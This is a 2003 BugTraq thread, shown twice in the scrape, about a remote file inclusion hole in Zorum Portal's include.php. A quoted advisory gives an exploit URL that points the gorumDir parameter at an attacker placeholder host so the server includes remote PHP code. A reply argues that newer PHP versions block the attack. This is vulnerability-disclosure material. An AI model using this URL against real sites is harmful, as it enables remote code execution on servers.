BugTraq
Back to list
|
Post reply
Re: Zorum Portal (PHP)
Jan 26 2003 07:03PM
Frog Man (leseulfrog hotmail com)
(1 replies)
Re[2]: Zorum Portal (PHP)
Jan 29 2003 04:39AM
Messer (igmpfrag dezigner ru)
(1 replies)
Hello MGHz,
>>From: MGhz <magas (at) mail (dot) lt [email concealed]>
>>To: bugtraq (at) securityfocus (dot) com [email concealed]
>>Subject: Zorum Portal (PHP)
>>Date: 22 Jan 2003 19:45:26 -0000
>>
>>
>>
>>Version : 3.0;3.1;3.2
>>Website : http://zorum.phpoutsourcing.com/
>>Problem : Include file
>>
>>
>>File:
>>---------------------------------
>>include.php
>>---------------------------------
>>
>>PHP Code:
>>---------------------------------
>>[...]
>>include("$gorumDir/generformlib_multipleselection.php");
>>include("$gorumDir/generformlib_groupselection.php");
>>include("$gorumDir/generformlib_filebutton.php");
>>include("$gorumDir/group.php");
>>[...]
>>---------------------------------
>>
>>Exploit :
>>---------------------------------
>>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>>-->
>>include http://[attacker]/group.php on remote server
>>---------------------------------
>>
>>--
>>magas (at) mail (dot) lt [email concealed]
In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:
$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST
// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""
Messer.
[ reply ]
Re: Zorum Portal (PHP)
Jan 29 2003 08:12PM
MightyE (mightye mightye org)
Privacy Statement
Copyright 2010, SecurityFocus
>>From: MGhz <magas (at) mail (dot) lt [email concealed]>
>>To: bugtraq (at) securityfocus (dot) com [email concealed]
>>Subject: Zorum Portal (PHP)
>>Date: 22 Jan 2003 19:45:26 -0000
>>
>>
>>
>>Version : 3.0;3.1;3.2
>>Website : http://zorum.phpoutsourcing.com/
>>Problem : Include file
>>
>>
>>File:
>>---------------------------------
>>include.php
>>---------------------------------
>>
>>PHP Code:
>>---------------------------------
>>[...]
>>include("$gorumDir/generformlib_multipleselection.php");
>>include("$gorumDir/generformlib_groupselection.php");
>>include("$gorumDir/generformlib_filebutton.php");
>>include("$gorumDir/group.php");
>>[...]
>>---------------------------------
>>
>>Exploit :
>>---------------------------------
>>http://[target]/[forum_dir]/include.php?gorumDir=http://[attacker]/
>>-->
>>include http://[attacker]/group.php on remote server
>>---------------------------------
>>
>>--
>>magas (at) mail (dot) lt [email concealed]
In new versions of PHP (PHP 4.2.3 and higher) for reception of values
transmitted to the form it's necessary to write:
$Variable = $HTTP_GET_VARS ['var']; // Request Method - GET
or
$Variable = $HTTP_POST_VARS ['var']; // Request Method - POST
// example: http://host.com/script.php?var1=value1&var2=value2
$Var_1 = $HTTP_GET_VARS['var1'];
$Var_2 = $var2;
// $Var_1 == "value1"
// $Var_2 == ""
Messer.
[ reply ]